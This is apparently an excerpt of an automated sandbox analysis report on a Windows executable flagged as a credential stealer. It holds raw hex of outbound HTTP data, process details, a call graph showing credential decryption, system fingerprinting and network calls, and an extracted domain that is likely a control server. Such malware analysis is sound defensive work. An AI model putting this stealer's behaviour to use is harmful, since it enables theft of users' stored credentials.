                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: fc 17 d3 36 89 fe c0 d6 81 47 3f 82 73 90 d0 5b 86 7e 8b e8 9a 19 a7 bb 68 4d 31 b4 fa cd d3 88 ef 8e 67 66 69 da b0 ee 00 72 b8 ac db 5a cf 2d a7 12 8c 7f ab a9 69 b9 1c f9 69 00 57 65 ae fd 01 4d 9c f7 46 bd 82 24 66 7b 87 12 69 e4 31 8a da 1f e3 26 c8 23 9e e6 1b b0 d7 77 c5 f1 f5 0d bd 26 73 d0 6d e8 eb f1 03 a4 5e 6f cb 53 92 5e f6 aa f4 72 85 e1 ff 8c f7 80 3a d1 39 c1 9a d0 57 ef 4a 1f d0 fa db b5 c6 89 87 0c 57 95 fa 0b 7d 51 6a dd b5 a2 2d 54 5d 8c 9a e6 07 ac d2 d5 5b 99 19 7d 59 58 72 fc ca 9b c5 56 04 96 b2 72 86 93 26 31 f4 32 f1 38 61 f4 82 8e 35 52 d3 52 a9 55 7f 3f 5e f5 b3 63 50 a9 26 b0 91 a9 31 a0 10 3c be 6d bb ea 8f 7c 57 bf 2d f3 c0 45 99 08 bf 95 d2 65 11 ce b1 8c 4f f5 ef ca b3 f3 92 00 de 62 1c a2 49 b2 87 3d a9 bc 1b 39 ae 6d 28
                                                                                                              Data Ascii: 6G?s[~hM1gfirZ-iiWeMF$f{i1&#w&sm^oS^r:9WJW}Qj-T][}YXrVr&128a5RRU?^cP&1<m|W-EeObI=9m(
                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: e5 ad 7a 55 d8 59 f8 1d 01 f8 17 67 6c dd e7 dc 4f 9c 92 89 90 1b d5 5a f7 50 62 14 48 e4 e7 6a dc 9c 0d 15 98 d1 5a 79 4b 6b 2d e3 ba 64 92 dc 48 9b 7f 0e 80 35 b1 8a 8d 5f 24 e8 d5 1d 90 99 80 bc 69 24 97 91 8f d9 73 91 da 28 88 db 36 f3 55 5b 6a 31 21 bc 1a 10 82 01 3c c1 2e 2c 04 d2 88 71 3c 26 fe 92 74 15 47 b2 22 93 a5 e1 2c cc b8 10 68 38 a4 6c 81 97 87 c9 4a 55 0e c3 07 4a 1a 9a 34 67 82 e4 3c 92 cb 59 c7 9d fc e7 84 26 ea fb e9 62 e0 ba 7a 66 31 f6 ed c1 64 df 75 cf 6d 9a cc 5f 3f b4 03 46 2e a1 de 4b 4a 00 52 72 ee 9f 31 16 b4 a2 b6 d0 d6 52 bc 76 a2 20 f6 5a df c3 28 e6 d8 f7 1d 12 2e d5 3f 14 f9 90 82 c6 ad f4 3a c9 69 c4 19 49 08 ec ef 6a ee cf 3f 19 d2 fb 2f f7 99 7e 4a b1 b1 0e 57 18 08 93 da 3c 95 4c 88 35 17 27 9b 31 cc 77 91 65 e9 de 84
                                                                                                              Data Ascii: zUYglOZPbHjZyKk-dH5_$i$s(6U[j1!<.,q<&tG",h8lJUJ4g<Y&bzf1dum_?F.KJRr1Rv Z(.?:iIj?/~JW<L5'1we
                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: 83 91 b4 5f a9 ec 0f bb 6d 88 b5 7a 21 1e fa c1 53 b1 b1 91 da b1 24 f9 ac 6a e7 a6 16 0b 6f 7d 56 32 7e f9 a1 a6 1b 87 49 29 1f 01 dd 2b 85 17 93 41 e2 25 90 33 a5 d8 ab d4 fa 1d 5d c1 d0 09 4f 5c e7 2a c5 9b cb 12 4a 07 92 3a 93 27 5a 6e 0a 8d 64 ab 76 e9 b1 0a 9b 5d 1b 1f 97 ba f4 9f 21 29 55 30 2a a2 82 63 8a c6 9a 08 5e e9 f5 14 bb 7d c9 34 41 5b d5 78 e0 be 61 4b c9 c2 a0 49 89 3e 2e 81 37 70 69 2f fc fb ef 8c e6 be 11 4a 9d b3 58 b5 c0 e7 70 fe b5 38 3b 07 42 cf 5a f6 9a 73 da b7 43 9a 96 26 5c af a0 a0 1f 17 b4 75 01 bd d8 d9 e8 19 23 ba 98 e3 92 fd bc 10 58 d5 af 91 42 1c fd e2 62 fb d9 b5 53 81 1b 50 82 99 81 7f 35 47 aa b6 bc 99 46 be e1 b3 dd df be 5d 60 f5 4a b2 c0 f2 95 22 6b 7d 83 48 1d 49 66 25 ec a4 4a 33 cc 36 fa a0 6a f8 3f fb da 41 c9
                                                                                                              Data Ascii: _mz!S$jo}V2~I)+A%3]O\*J:'Zndv]!)U0*c^}4A[xaKI>.7pi/JXp8;BZsC&\u#XBbSP5GF]`J"k}HIf%J36j?A
                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: 1c c6 9a 02 ec f2 f5 ed f4 48 a2 1f 9c 4b d2 59 6d 27 43 93 dd 09 33 91 15 b2 d2 82 c7 7b 0c db ae f8 fa b2 67 c1 15 4c 72 38 51 8c a6 60 de d5 12 6c a4 2d 54 d5 71 52 b0 a6 6c ff 96 e5 dd 0f dc ae ac b1 dc 78 6a 80 20 86 cf 6c 16 c6 af d9 05 8c ce 04 cf 6d e4 bd 5a 8a de 06 7b 1f d7 13 80 b0 ad 79 14 a7 34 58 73 d6 db c4 bf 93 c5 33 32 64 45 a8 c5 20 71 a5 ff 6c a1 3f 98 6f a3 d2 f6 71 de 8f 1e f0 cd a7 e4 72 39 df d0 1d d5 28 b7 2e 3c 4b 6b f1 e5 39 fe 2a a8 a0 6a cf c3 25 ba de 48 5f 48 f3 a0 ff 3a 34 f9 01 85 78 d0 e9 5f d3 10 85 23 64 09 8f 04 46 10 f4 d8 09 6f 54 12 b7 49 64 44 88 4a b3 49 2b 3d 5f 5d f8 9f 76 c8 e3 60 ca cb 41 09 1c 56 fb f1 ea 85 3e 68 fa 10 d5 f4 5c 9f 7f c1 bd d4 e0 dd f5 c5 e0 50 40 b5 c2 6a 32 b5 5c 96 95 32 9c b5 77 eb fd ff
                                                                                                              Data Ascii: HKYm'C3{gLr8Q`l-TqRlxj lmZ{y4Xs32dE ql?oqr9(.<Kk9*j%H_H:4x_#dFoTIdDJI+=_]v`AV>h\P@j2\2w
                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: 1c 3f a1 25 31 6b 43 6f cd 2f c9 90 77 ac cc 7a 98 30 ee 57 1f 02 52 9e 6a a7 94 61 95 b7 bd e0 1a bc 97 cd 51 87 48 19 91 7e c2 0d f8 23 dd 59 b3 06 e4 f7 c7 b5 1a f5 a4 86 92 c8 a6 b8 c6 5a d3 15 26 0a 83 59 5f 38 b5 be c1 a6 45 f6 ed 22 36 90 74 97 b8 0d b7 44 2a 6a 1f ca d3 27 4f c9 1d a1 24 6e 59 99 0c 17 ae 3f df 2d 02 af f1 11 ff f0 c4 48 94 9b c4 39 90 8a 2e c9 68 f4 ff 7f 43 09 e4 0f 7d c0 38 f0 d8 1f 18 8a ea d7 3d 6f c5 29 52 5e 5e 32 ed 36 9c ce 21 0d 33 b4 0b 3c c5 00 42 87 5b 18 a5 9d d2 f8 6b 4a 48 1a f1 d2 71 e4 d1 95 02 56 b5 f3 fe f1 f4 e1 bd dd 99 f1 b4 8f ab 9b 86 d3 ff bf f4 ab b6 6a 6d 0d 42 04 6e 05 fa 7f a2 73 28 d0 b0 44 6c 01 cb 1e 5c 7f d3 fe 15 93 94 11 67 a6 98 1d 43 b6 d8 52 d2 9e c4 40 10 91 85 8e 1b 21 50 78 33 df ff d6 a2
                                                                                                              Data Ascii: ?%1kCo/wz0WRjaQH~#YZ&Y_8E"6tD*j'O$nY?-H9.hC}8=o)R^^26!3<B[kJHqVjmBns(Dl\gCR@!Px3
                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: fd 6e 82 c8 ae 47 f8 51 91 a2 b0 0d 4d 71 b7 aa a3 bd b7 9c 84 70 ae ef 55 9e 36 80 eb 1c fe c5 b1 ab 19 88 ac 4f 7d 5f 37 ee c5 3c be fb 11 8e e9 69 a5 90 50 62 b9 1e b6 38 25 59 35 a5 00 0e bc c0 3c 53 94 8c 2c 2a cc 74 22 9b f3 a3 68 8b e7 dd f7 9b 00 bf 10 1d d4 a3 cb c0 ad 13 e5 71 54 6c fb 71 17 37 63 d9 b6 18 db f8 88 c6 4b 7f dd 69 a7 5e fd ab d5 bf 29 7d 5f 1f fd 0b a7 f8 06 7e 6a 1f 59 1c 04 ea db 44 16 5d 59 fb 19 aa 24 ba 71 3c f7 56 f1 2c e4 71 61 26 b7 09 9b e8 ef 78 d0 b1 c8 72 3d f8 20 3b a7 6f cb 00 c0 b9 aa 00 03 c4 59 ae 51 fa a7 1b 5e 1f 20 ef 89 95 17 39 e4 d5 da cc 39 8c 70 0b 97 b9 65 89 27 b4 09 70 46 fb af 7e fa 41 08 46 9d 30 fc 1c 9c b9 01 ef f7 d8 ad b4 45 d6 de 23 cd 50 da c7 d7 c1 2f a8 5c db 5f bf 2e d6 0c e6 ec 79 7f 87 e9
                                                                                                              Data Ascii: nGQMqpU6O}_7<iPb8%Y5<S,*t"hqTlq7cKi^)}_~jYD]Y$q<V,qa&xr= ;oYQ^ 99pe'pF~AF0E#P/\_.y
                                                                                                              2024-12-27 13:53:42 UTC1130INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 13:53:42 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=12q3279td09685q9inqbqsn6bs; expires=Tue, 22 Apr 2025 07:40:21 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p4VcYvJxRZf8AK1Gj6oHTyoyl73iHNkC7OEH8CQRVOQRD6fiLRWIYHdXQfYeiVnu3YAu3QiQHNiYGtYuCZaOjIkU1KrKUbPJEdQ11to0CnTk2nIJ7wamwergiVFnaj%2FteaY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f89cc545d4872a1-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19075&min_rtt=1834&rtt_var=11048&sent=339&recv=577&lost=0&retrans=0&sent_bytes=2837&recv_bytes=554773&delivery_rate=1592148&cwnd=194&unsent_bytes=0&cid=20e83bc5920baa90&ts=2459&x=0"


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Target ID:0
                                                                                                              Start time:08:53:19
                                                                                                              Start date:27/12/2024
                                                                                                              Path:C:\Users\user\Desktop\Wvo9FU4qo9.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Wvo9FU4qo9.exe"
                                                                                                              Imagebase:0x4b0000
                                                                                                              File size:1'890'304 bytes
                                                                                                              MD5 hash:D65DFAAFD41DE8A252A930DA84763E79
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1602681941.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:3.1%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:79.4%
                                                                                                                Total number of Nodes:359
                                                                                                                Total number of Limit Nodes:29
                                                                                                                execution_graph 15322 4eeb88 15323 4eeba0 15322->15323 15326 4eebde 15323->15326 15329 4ee110 LdrInitializeThunk 15323->15329 15324 4eec4e 15326->15324 15328 4ee110 LdrInitializeThunk 15326->15328 15328->15324 15329->15326 15113 4dd34a 15114 4dd370 15113->15114 15114->15114 15115 4dd3ea GetPhysicallyInstalledSystemMemory 15114->15115 15116 4dd410 15115->15116 15330 4b8600 15333 4b860f 15330->15333 15331 4b8a48 ExitProcess 15333->15331 15334 4ee080 15333->15334 15335 4ef970 15334->15335 15336 4ee085 FreeLibrary 15335->15336 15336->15331 15337 4be687 15338 4be6a0 15337->15338 15343 4e9280 15338->15343 15340 4be77a 15341 4e9280 5 API calls 15340->15341 15342 4be908 15341->15342 15342->15342 15344 4e92b0 15343->15344 15346 4e954f SysAllocString 15344->15346 15350 4e98eb 15344->15350 15345 4e9916 GetVolumeInformationW 15349 4e9934 15345->15349 15347 4e9574 15346->15347 15348 4e957c CoSetProxyBlanket 15347->15348 15347->15350 15348->15350 15352 4e959c 15348->15352 15349->15340 15350->15345 15351 4e98d6 SysFreeString SysFreeString 15351->15350 15352->15351 15353 4e679f 15356 4e67bc 15353->15356 15354 4e682d 15356->15354 15357 4ee110 LdrInitializeThunk 15356->15357 15357->15356 15117 4ec55c RtlAllocateHeap 15363 4b9d1e 15364 4b9d40 15363->15364 15364->15364 15365 4b9d94 LoadLibraryExW 15364->15365 15366 4b9da5 15365->15366 15367 4b9e74 LoadLibraryExW 15366->15367 15368 4b9e85 15367->15368 15118 4bef53 15119 4bef5c CoInitializeEx 15118->15119 15120 4d2e6d 15121 4d2e84 15120->15121 15141 4d2ef7 15120->15141 15126 4d2ef2 15121->15126 15159 4ee110 LdrInitializeThunk 15121->15159 15122 4d392c 15127 4d3c0e RtlExpandEnvironmentStrings 15122->15127 15129 4d3c50 15122->15129 15137 4d3ce2 15122->15137 15122->15141 15124 4d34eb 15124->15122 15125 4d373a 15124->15125 15133 4d3670 15124->15133 15124->15141 15125->15122 15125->15125 15125->15141 15161 4ee110 LdrInitializeThunk 15125->15161 15126->15124 15128 4d3a8f 15126->15128 15126->15141 15127->15129 15162 4ee110 LdrInitializeThunk 15128->15162 15130 4d3c9e RtlExpandEnvironmentStrings 15129->15130 15135 4d3f58 15129->15135 15129->15137 15139 4d3def 15129->15139 15129->15141 15130->15135 15130->15137 15130->15139 15130->15141 15133->15141 15160 4ee110 LdrInitializeThunk 15133->15160 15135->15135 15135->15141 15146 4d1d00 15135->15146 15137->15137 15142 4f14b0 15137->15142 15139->15135 15139->15139 15140 4f14b0 LdrInitializeThunk 15139->15140 15139->15141 15140->15135 15143 4f14d0 15142->15143 15144 4f15fe 15143->15144 15163 4ee110 LdrInitializeThunk 15143->15163 15144->15139 15164 4f1320 15146->15164 15148 4d1d43 15151 4d23f5 15148->15151 15157 4d1de9 15148->15157 15168 4ee110 LdrInitializeThunk 15148->15168 15150 4ec570 RtlFreeHeap 15152 4d239e 15150->15152 15151->15141 15152->15151 15174 4ee110 LdrInitializeThunk 15152->15174 15154 4d2383 15154->15150 15155 4d245a 15154->15155 15157->15154 15169 4ee110 LdrInitializeThunk 15157->15169 15170 4ec570 15157->15170 15159->15126 15160->15141 15161->15125 15162->15122 15163->15144 15166 4f1340 15164->15166 15165 4f145e 15165->15148 15166->15165 15175 4ee110 LdrInitializeThunk 15166->15175 15168->15148 15169->15157 15171 4ec585 15170->15171 15172 4ec583 15170->15172 15173 4ec58a RtlFreeHeap 15171->15173 15172->15157 15173->15157 15174->15152 15175->15165 15176 4dd7ee 15177 4dd7f5 FreeLibrary 15176->15177 15179 4ddbc9 15177->15179 15179->15179 15180 4ddc30 GetComputerNameExA 15179->15180 15369 509934 15370 509a0e VirtualAlloc 15369->15370 15371 4e0b2b CoSetProxyBlanket 15182 4dc9eb 15183 4dc8e2 15182->15183 15183->15183 15184 4dcab5 15183->15184 15186 4ee110 LdrInitializeThunk 15183->15186 15186->15183 15372 4eea29 15373 4eea50 15372->15373 15375 4eea8e 15373->15375 15379 4ee110 LdrInitializeThunk 15373->15379 15378 4ee110 LdrInitializeThunk 15375->15378 15377 4eeb59 15378->15377 15379->15375 15187 4ee967 15188 4ee980 15187->15188 15188->15188 15191 4ee110 LdrInitializeThunk 15188->15191 15190 4ee9ef 15191->15190 15380 4c1227 15381 4c1241 15380->15381 15382 4c14e5 RtlExpandEnvironmentStrings 15381->15382 15386 4bf444 15381->15386 15387 4c1562 15382->15387 15383 4b8b60 ExitProcess 15384 4c1c4e 15383->15384 15388 4c57c0 15384->15388 15387->15383 15387->15386 15389 4c57e0 15388->15389 15389->15389 15390 4f1320 LdrInitializeThunk 15389->15390 15391 4c58ed 15390->15391 15394 4c5ae8 15391->15394 15397 4c5b92 15391->15397 15407 4c594e 15391->15407 15414 4c5cad 15391->15414 15418 4f1720 15391->15418 15394->15407 15437 4ee110 LdrInitializeThunk 15394->15437 15396 4f1720 LdrInitializeThunk 15396->15414 15397->15397 15398 4f1320 LdrInitializeThunk 15397->15398 15398->15414 15399 4c6319 15412 4c66be 15399->15412 15415 4c634d 15399->15415 15402 4c6f0e 15403 4c60b5 CryptUnprotectData 15405 4c60df 15403->15405 15403->15414 15404 4c65bd 15406 4cc8a0 2 API calls 15404->15406 15405->15386 15405->15399 15405->15405 15405->15415 15425 4cc8a0 15405->15425 15406->15407 15407->15386 15410 4c731b 15416 4c6792 15412->15416 15438 4ee110 LdrInitializeThunk 15412->15438 15413 4c68eb 15413->15402 15440 4ee110 LdrInitializeThunk 15413->15440 15414->15396 15414->15403 15414->15405 15414->15407 15424 4ee110 LdrInitializeThunk 15414->15424 15415->15404 15415->15407 15417 4f14b0 LdrInitializeThunk 15415->15417 15416->15413 15439 4ee110 LdrInitializeThunk 15416->15439 15417->15415 15419 4f1750 15418->15419 15422 4f17a9 15419->15422 15441 4ee110 LdrInitializeThunk 15419->15441 15420 4c593f 15420->15394 15420->15397 15420->15407 15420->15414 15422->15420 15442 4ee110 LdrInitializeThunk 15422->15442 15424->15414 15426 4cc8ca 15425->15426 15443 4c4ca0 15426->15443 15428 4cc9cb 15429 4c4ca0 2 API calls 15428->15429 15430 4cca59 15429->15430 15431 4c4ca0 2 API calls 15430->15431 15432 4ccadf 15431->15432 15433 4c4ca0 2 API calls 15432->15433 15434 4ccbf9 15433->15434 15435 4c4ca0 2 API calls 15434->15435 15436 4ccc62 15435->15436 15436->15399 15437->15412 15438->15416 15439->15413 15440->15410 15441->15422 15442->15420 15444 4c4cc0 15443->15444 15444->15444 15445 4f1320 LdrInitializeThunk 15444->15445 15446 4c4e14 15445->15446 15447 4f1320 LdrInitializeThunk 15446->15447 15470 4c5021 15447->15470 15448 4c50e9 15451 4ec570 RtlFreeHeap 15448->15451 15449 4c509e 15449->15448 15450 4c522e 15449->15450 15475 4c5170 15449->15475 15450->15428 15455 4c50ef 15451->15455 15452 4c5551 15479 4ee110 LdrInitializeThunk 15452->15479 15454 4c5152 15456 4c55f1 15454->15456 15457 4c579e 15454->15457 15458 4c55d3 15454->15458 15459 4c57b0 15454->15459 15465 4c563c 15454->15465 15474 4c55ff 15454->15474 15476 4c5696 15454->15476 15480 4ec5a0 15454->15480 15455->15454 15500 4ee110 LdrInitializeThunk 15455->15500 15456->15457 15456->15459 15464 4f1320 LdrInitializeThunk 15456->15464 15456->15465 15456->15474 15456->15476 15502 4ec990 15457->15502 15458->15456 15458->15457 15458->15459 15458->15465 15458->15474 15458->15476 15492 4eca40 15458->15492 15462 4ec990 LdrInitializeThunk 15459->15462 15468 4c57b9 15462->15468 15464->15465 15466 4f1720 LdrInitializeThunk 15465->15466 15465->15474 15465->15476 15466->15465 15468->15468 15470->15448 15470->15449 15470->15475 15478 4ee110 LdrInitializeThunk 15470->15478 15471 4ee110 LdrInitializeThunk 15471->15475 15474->15428 15475->15450 15475->15452 15475->15471 15476->15474 15501 4ee110 LdrInitializeThunk 15476->15501 15478->15449 15479->15455 15481 4ec5d0 15480->15481 15483 4ec62e 15481->15483 15506 4ee110 LdrInitializeThunk 15481->15506 15485 4c55c7 15483->15485 15487 4ec749 15483->15487 15507 4ee110 LdrInitializeThunk 15483->15507 15484 4ec570 RtlFreeHeap 15484->15485 15488 4ec830 15485->15488 15487->15484 15489 4ec8fe 15488->15489 15490 4ec841 15488->15490 15489->15458 15490->15489 15508 4ee110 LdrInitializeThunk 15490->15508 15493 4ecaea 15492->15493 15494 4eca5a 15492->15494 15493->15456 15494->15493 15496 4ecae2 15494->15496 15509 4ee110 LdrInitializeThunk 15494->15509 15497 4ecc4e 15496->15497 15510 4ee110 LdrInitializeThunk 15496->15510 15497->15493 15511 4ee110 LdrInitializeThunk 15497->15511 15500->15454 15501->15457 15503 4eca0e 15502->15503 15504 4ec99a 15502->15504 15503->15459 15504->15503 15512 4ee110 LdrInitializeThunk 15504->15512 15506->15483 15507->15487 15508->15489 15509->15496 15510->15497 15511->15493 15512->15503 15192 4ee760 15194 4ee780 15192->15194 15193 4ee7be 15194->15193 15196 4ee110 LdrInitializeThunk 15194->15196 15196->15193 15513 4ec5a0 15514 4ec5d0 15513->15514 15516 4ec62e 15514->15516 15521 4ee110 LdrInitializeThunk 15514->15521 15518 4ec801 15516->15518 15520 4ec749 15516->15520 15522 4ee110 LdrInitializeThunk 15516->15522 15517 4ec570 RtlFreeHeap 15517->15518 15520->15517 15521->15516 15522->15520 15523 4e8ea0 15524 4e8ec5 15523->15524 15526 4e8fc9 15524->15526 15532 4ee110 LdrInitializeThunk 15524->15532 15528 4e9210 15526->15528 15529 4e90e1 15526->15529 15531 4ee110 LdrInitializeThunk 15526->15531 15529->15528 15533 4ee110 LdrInitializeThunk 15529->15533 15531->15526 15532->15524 15533->15529 15534 4ee0a0 15535 4ee0c0 15534->15535 15536 4ee0f3 15534->15536 15538 4ee0d4 15534->15538 15539 4ee0e8 15534->15539 15535->15536 15535->15538 15537 4ec570 RtlFreeHeap 15536->15537 15537->15539 15540 4ee0d9 RtlReAllocateHeap 15538->15540 15540->15539 15197 509c7f 15198 50a164 VirtualAlloc 15197->15198 15200 50a211 15198->15200 15541 4f0d20 15542 4f0d2f 15541->15542 15546 4f0e98 15542->15546 15549 4ee110 LdrInitializeThunk 15542->15549 15543 4f114b 15545 4ec570 RtlFreeHeap 15545->15543 15546->15543 15548 4f108e 15546->15548 15550 4ee110 LdrInitializeThunk 15546->15550 15548->15545 15549->15546 15550->15548 15551 4dd7bd 15552 4dd7ca GetComputerNameExA 15551->15552 15201 4bcc7a 15242 4b8b60 15201->15242 15203 4bcc86 15204 4b8b60 ExitProcess 15203->15204 15205 4bcca2 15204->15205 15247 4d42d0 15205->15247 15207 4bcca8 15208 4b8b60 ExitProcess 15207->15208 15209 4bccbe 15208->15209 15258 4d4560 15209->15258 15211 4bccc4 15212 4b8b60 ExitProcess 15211->15212 15213 4bccd7 15212->15213 15269 4d7440 15213->15269 15215 4bcce6 15216 4b8b60 ExitProcess 15215->15216 15217 4bcd0e 15216->15217 15277 4d90d0 15217->15277 15219 4bcd14 15220 4b8b60 ExitProcess 15219->15220 15221 4bcd2a 15220->15221 15222 4b8b60 ExitProcess 15221->15222 15223 4bcd4c 15222->15223 15224 4b8b60 ExitProcess 15223->15224 15225 4bcd68 15224->15225 15226 4d42d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 15225->15226 15227 4bcd6e 15226->15227 15228 4b8b60 ExitProcess 15227->15228 15229 4bcd84 15228->15229 15230 4d4560 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 15229->15230 15231 4bcd8a 15230->15231 15232 4b8b60 ExitProcess 15231->15232 15233 4bcd9d 15232->15233 15234 4d7440 RtlFreeHeap LdrInitializeThunk 15233->15234 15235 4bcdac 15234->15235 15236 4b8b60 ExitProcess 15235->15236 15237 4bcdd4 15236->15237 15238 4d90d0 RtlExpandEnvironmentStrings 15237->15238 15239 4bcdda 15238->15239 15240 4b8b60 ExitProcess 15239->15240 15241 4bcdf0 15240->15241 15281 4b8530 15242->15281 15244 4b8b9d 15245 4b8530 ExitProcess 15244->15245 15246 4b8bec 15244->15246 15245->15244 15246->15203 15248 4d4360 15247->15248 15248->15248 15249 4d4376 RtlExpandEnvironmentStrings 15248->15249 15251 4d43d0 15249->15251 15252 4d46e1 15251->15252 15254 4d4431 RtlExpandEnvironmentStrings 15251->15254 15257 4d4450 15251->15257 15285 4f06f0 15251->15285 15293 4f0460 15252->15293 15254->15251 15254->15252 15254->15257 15257->15207 15257->15257 15259 4d456e 15258->15259 15260 4f0340 LdrInitializeThunk 15259->15260 15262 4d4408 15260->15262 15261 4f06f0 2 API calls 15261->15262 15262->15261 15263 4d46e1 15262->15263 15264 4d4450 15262->15264 15267 4d4431 RtlExpandEnvironmentStrings 15262->15267 15265 4f0460 2 API calls 15263->15265 15264->15211 15266 4d4712 15265->15266 15266->15264 15268 4f0340 LdrInitializeThunk 15266->15268 15267->15262 15267->15263 15267->15264 15268->15264 15270 4d7460 15269->15270 15273 4d74ae 15270->15273 15310 4ee110 LdrInitializeThunk 15270->15310 15271 4d7726 15271->15215 15273->15271 15276 4d756e 15273->15276 15311 4ee110 LdrInitializeThunk 15273->15311 15274 4ec570 RtlFreeHeap 15274->15271 15276->15274 15276->15276 15278 4d9110 15277->15278 15278->15278 15279 4d9136 RtlExpandEnvironmentStrings 15278->15279 15280 4d9180 15279->15280 15280->15280 15282 4b8595 15281->15282 15283 4b8542 15281->15283 15282->15283 15284 4b859c ExitProcess 15282->15284 15283->15244 15284->15283 15286 4f0710 15285->15286 15289 4f075e 15286->15289 15305 4ee110 LdrInitializeThunk 15286->15305 15287 4f09d3 15287->15251 15289->15287 15292 4f084e 15289->15292 15306 4ee110 LdrInitializeThunk 15289->15306 15290 4ec570 RtlFreeHeap 15290->15287 15292->15290 15292->15292 15294 4f0480 15293->15294 15297 4f04ce 15294->15297 15307 4ee110 LdrInitializeThunk 15294->15307 15295 4d4712 15295->15257 15301 4f0340 15295->15301 15297->15295 15300 4f05af 15297->15300 15308 4ee110 LdrInitializeThunk 15297->15308 15298 4ec570 RtlFreeHeap 15298->15295 15300->15298 15300->15300 15303 4f0360 15301->15303 15302 4f042f 15302->15257 15303->15302 15309 4ee110 LdrInitializeThunk 15303->15309 15305->15289 15306->15292 15307->15297 15308->15300 15309->15302 15310->15273 15311->15276 15312 4bec77 15313 4bec8e CoInitializeSecurity 15312->15313 15554 4b9eb7 15555 4efe00 15554->15555 15556 4b9ec7 WSAStartup 15555->15556 15314 4d18f0 15315 4d1950 15314->15315 15316 4d18fe 15314->15316 15318 4d1a10 15316->15318 15319 4d1a20 15318->15319 15319->15319 15320 4f14b0 LdrInitializeThunk 15319->15320 15321 4d1b0f 15320->15321
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "7M$%"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$mindhandru.buzz$p7M$s$wdnf$~SS}$rp
                                                                                                                • API String ID: 0-492231312
                                                                                                                • Opcode ID: 831fdc47a0ee33ef5e849e02a5efaaf2111ea89f9ea1d0bd95952dde206b564b
                                                                                                                • Instruction ID: 3cf622a18649f94140edf3c6408c2a18cd1467769b101f1f73952081219d9413
                                                                                                                • Opcode Fuzzy Hash: 831fdc47a0ee33ef5e849e02a5efaaf2111ea89f9ea1d0bd95952dde206b564b
                                                                                                                • Instruction Fuzzy Hash: 12B234B1A08301CFD714CF29C8917ABBBE2FF85314F19856EE4859B391D7389912CB96
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
